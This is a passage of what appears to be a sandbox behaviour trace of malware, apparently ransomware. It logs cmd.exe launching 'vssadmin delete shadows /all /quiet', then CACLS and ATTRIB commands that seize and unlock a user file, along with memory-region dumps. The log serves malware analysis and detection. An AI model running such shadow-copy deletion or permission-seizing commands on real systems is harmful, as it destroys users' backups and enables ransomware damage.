[0190.905] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0190.905] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0190.905] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0190.905] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0190.905] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0190.906] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0190.906] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0190.906] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0190.906] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0190.906] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0190.906] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0190.906] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0190.906] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0190.906] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0190.906] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0190.906] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0190.906] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0190.906] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0190.906] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0190.906] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0190.906] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0190.906] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0190.906] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0190.906] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0190.906] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0190.906] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0190.906] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0190.906] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0190.906] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0190.907] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0190.907] SetErrorMode (uMode=0x0) returned 0x0 [0190.907] SetErrorMode (uMode=0x1) returned 0x0 [0190.907] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x471c08, lpFilePart=0x26f258 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f258*="Desktop") returned 0x18 [0190.907] SetErrorMode (uMode=0x0) returned 0x1 [0190.907] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.907] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.912] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.912] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x26eff4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eff4) returned 0xffffffff [0190.913] GetLastError () returned 0x2 [0190.913] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x26efd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26efd4) returned 0xffffffff [0190.913] GetLastError () returned 0x2 [0190.913] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x26efd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26efd4) returned 0xffffffff [0190.913] GetLastError () returned 0x2 [0190.913] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x26eff4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26eff4) returned 0x470898 [0190.913] FindClose (in: hFindFile=0x470898 | out: hFindFile=0x470898) returned 1 [0190.913] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0190.913] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0190.913] GetConsoleTitleW (in: lpConsoleTitle=0x26f4cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.913] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f354, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26f41c | out: lpAttributeList=0x26f354, lpSize=0x26f41c) returned 1 [0190.913] UpdateProcThreadAttribute (in: lpAttributeList=0x26f354, dwFlags=0x0, Attribute=0x60001, lpValue=0x26f414, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f354, lpPreviousValue=0x0) returned 1 [0190.913] GetStartupInfoW (in: lpStartupInfo=0x26f310 | out: lpStartupInfo=0x26f310*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="cmd.exe /C vssadmin.exe delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.913] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.914] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26f3b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f3fc | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet ", lpProcessInformation=0x26f3fc*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9b4, dwThreadId=0x290)) returned 1 [0190.916] CloseHandle (hObject=0x4c) returned 1 [0190.916] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.917] GetEnvironmentStringsW () returned 0x4708f8* [0190.917] FreeEnvironmentStringsW (penv=0x4708f8) returned 1 [0190.917] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0193.896] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26f2f0 | out: lpExitCode=0x26f2f0*=0x2) returned 1 [0193.896] CloseHandle (hObject=0x50) returned 1 [0193.896] _vsnwprintf (in: _Buffer=0x26f438, _BufferCount=0x13, _Format="%08X", _ArgList=0x26f2fc | out: _Buffer="00000002") returned 8 [0193.896] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0193.896] GetEnvironmentStringsW () returned 0x4708f8* [0193.896] FreeEnvironmentStringsW (penv=0x4708f8) returned 1 [0193.896] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0193.896] GetEnvironmentStringsW () returned 0x4708f8* [0193.896] FreeEnvironmentStringsW (penv=0x4708f8) returned 1 [0193.896] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f354 | out: lpAttributeList=0x26f354) [0193.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.896] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0193.896] _get_osfhandle (_FileHandle=1) returned 0x7 [0193.896] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0193.897] _get_osfhandle (_FileHandle=0) returned 0x3 [0193.897] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0193.897] SetConsoleInputExeNameW () returned 0x1 [0193.897] GetConsoleOutputCP () returned 0x1b5 [0193.897] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0193.897] SetThreadUILanguage (LangId=0x0) returned 0x409 [0193.897] exit (_Code=2) Process: id = "423" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x7ea16ca0" os_pid = "0x9b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "422" os_parent_pid = "0x890" cmd_line = "vssadmin.exe delete shadows /all /quiet " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27920 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27921 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27922 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27923 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 27924 start_va = 0x960000 end_va = 0x97efff entry_point = 0x960000 region_type = mapped_file name = "vssadmin.exe" filename = "\\Windows\\System32\\vssadmin.exe" (normalized: "c:\\windows\\system32\\vssadmin.exe") Region: id = 27925 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27926 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27927 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27928 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 27929 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27930 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27931 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27932 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27933 start_va = 0x1a0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 27934 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 27935 start_va = 0x70370000 end_va = 0x7037ffff entry_point = 0x70370000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 27936 start_va = 0x70380000 end_va = 0x70495fff entry_point = 0x70380000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 27937 start_va = 0x738a0000 end_va = 0x738b3fff entry_point = 0x738a0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 27938 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27939 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27940 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27941 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 27942 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27943 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27944 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27945 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27946 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 27947 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27948 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27949 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27950 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27951 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27952 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27953 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27954 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 27955 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 27956 start_va = 0x1c0000 end_va = 0x1ccfff entry_point = 0x1c0000 region_type = mapped_file name = "vssadmin.exe.mui" filename = "\\Windows\\System32\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\vssadmin.exe.mui") Region: id = 27957 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27958 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 27959 start_va = 0x250000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 27960 start_va = 0x980000 end_va = 0x157ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 27961 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 27984 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 27985 start_va = 0x650000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 27986 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 27987 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27988 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 27989 start_va = 0x4b0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 27990 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 27991 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 27992 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 27993 start_va = 0x690000 end_va = 0x95efff entry_point = 0x690000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 27994 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Thread: id = 600 os_tid = 0x290 Thread: id = 603 os_tid = 0xa8c Thread: id = 605 os_tid = 0xa58 Thread: id = 606 os_tid = 0x914 Thread: id = 607 os_tid = 0xe40 Process: id = "424" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16c40" os_pid = "0xab0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "421" os_parent_pid = "0x9d4" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27962 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27963 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 27964 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 27965 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 27966 start_va = 0xc30000 end_va = 0xc38fff entry_point = 0xc30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27967 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27968 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27969 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27970 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 27971 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27972 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27973 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27974 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27975 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 27976 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 27977 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27978 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27979 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27980 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27981 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27982 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27983 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 601 os_tid = 0x858 Thread: id = 602 os_tid = 0xa7c Process: id = "425" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea167e0" os_pid = "0x98c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "421" os_parent_pid = "0x9d4" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27995 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27996 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27997 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27998 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 27999 start_va = 0x660000 end_va = 0x666fff entry_point = 0x660000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 28000 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28001 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28002 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28003 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 28004 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28005 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28006 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28007 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28008 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 28009 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 28010 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 28011 start_va = 0x75540000 end_va = 